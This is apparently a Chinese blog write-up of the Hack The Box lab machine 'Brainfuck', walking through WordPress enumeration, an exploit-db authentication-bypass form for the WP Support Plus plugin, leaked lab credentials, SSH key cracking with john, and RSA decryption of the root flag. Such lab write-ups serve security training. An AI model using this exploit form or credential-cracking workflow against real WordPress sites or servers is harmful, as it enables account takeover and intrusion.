Brainfuck

Posted by on 2020年2月22日


Brainfuck

zenmap扫描端口

file
file

gedit /etc/hosts

file

访问443端口

file

wpscan扫描

wpscan --url https://brainfuck.htb --disable-tls-checks --enumerate p,t,u --plugins-detection aggressive --api-token <api-token>

新版的wpscan使用上面的命令只能扫描1500个插件,单独扫描plugins才可以扫描全部的插件

wpscan --url https://brainfuck.htb --disable-tls-checks --plugins-detection aggressive --api-token <api-token>

file

Google:WP support plus exploit

file

wpscan扫描出了用户名,首页上有一个电子邮件

file

exploit-db/41006
gedit exp.html

<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
    Username: <input type="text" name="username" value="admin">
    <input type="hidden" name="email" value="orestis@brainfuck.htb">
    <input type="hidden" name="action" value="loginGuestFacebook">
    <input type="submit" value="Login">
</form>

file

开启python http sever
python -m SimpleHTTPSever 80

file

点击submit后,在访问首页,发现已经是管理员权限

file
file

访问:https://brainfuck.htb/wp-admin/
访问plugins

file

SMTP:
用户名:orestis
密码:kHGuERB29DNiNE

file

nc 10.10.10.17 110
retr 1没有任何有用消息
retr 2获得一个用户名密码:
username: orestis
password: kIEnnfEKJ#9UmdO

file
file

想到https://sup3rs3cr3t.brainfuck.htb
还没有访问
使用
username: orestis
password: kIEnnfEKJ#9UmdO
访问,登陆成功

访问每段交流发现了两段文字

Mya qutf de buj otv rms dy srd vkdof :)
Pieagnm - Jkoijeg nbw zwx mle grwsnn

I am opening up an encrypted thread. Talk to you there!
Orestis - Hacking for fun and profit

file
file

decrypt
tool:decrypt/tool

file

解密后删除多余字符:
BrainfuCkmybrainfuckmybrainfu

交流里还有

Ybgbq wpl gw lto udgnju fcpp, C jybc zfu zrryolqp zfuz xjs rkeqxfrl ojwceec J uovg :)
mnvze://10.10.10.17/8zb5ra10m915218697q1h658wfoq0zc8/frmfycu/sp_ptr

file

根据之前解密出的字符猜测密钥为fuckmybrain

file

解密出:
https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa
访问下载

file

需要输入密码

file

使用john,爆破出密码为:3poulakia!

locate ssh2john
cp /usr/share/john/ssh2john.py .
python ssh2john.py id_rsa > ssh_login
john ssh_login --wordlist=/usr/share/wordlists/rockyou.txt

file

需要修改id_rsa的权限,ssh连接:

ssh -i id_rsa orestis@10.10.10.17

file
file

encrypt.sage|output.txt|debug.txt

orestis@brainfuck:~$ cat encrypt.sage
nbits = 1024

password = open(&quot;/root/root.txt&quot;).read().strip()
enc_pass = open(&quot;output.txt&quot;,&quot;w&quot;)
debug = open(&quot;debug.txt&quot;,&quot;w&quot;)
m = Integer(int(password.encode(&#039;hex&#039;),16))

p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
n = p*q
phi = (p-1)*(q-1)
e = ZZ.random_element(phi)
while gcd(e, phi) != 1:
    e = ZZ.random_element(phi)

c = pow(m, e, n)
enc_pass.write(&#039;Encrypted Password: &#039;+str(c)+&#039;\n&#039;)
debug.write(str(p)+&#039;\n&#039;)
debug.write(str(q)+&#039;\n&#039;)
debug.write(str(e)+&#039;\n&#039;)
orestis@brainfuck:~$ cat output.txt
Encrypted Password: 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182
orestis@brainfuck:~$ cat debug.txt
7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997

网上找到解密脚本
p = debug.txt line 1
q = debug.txt line 2
e = debug.txt line 3
ct = output.txt
保存到rsa_egcd.py

http://dann.com.br/alexctf2k17-crypto150-what_is_this_encryption/

file

get flag

file




发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据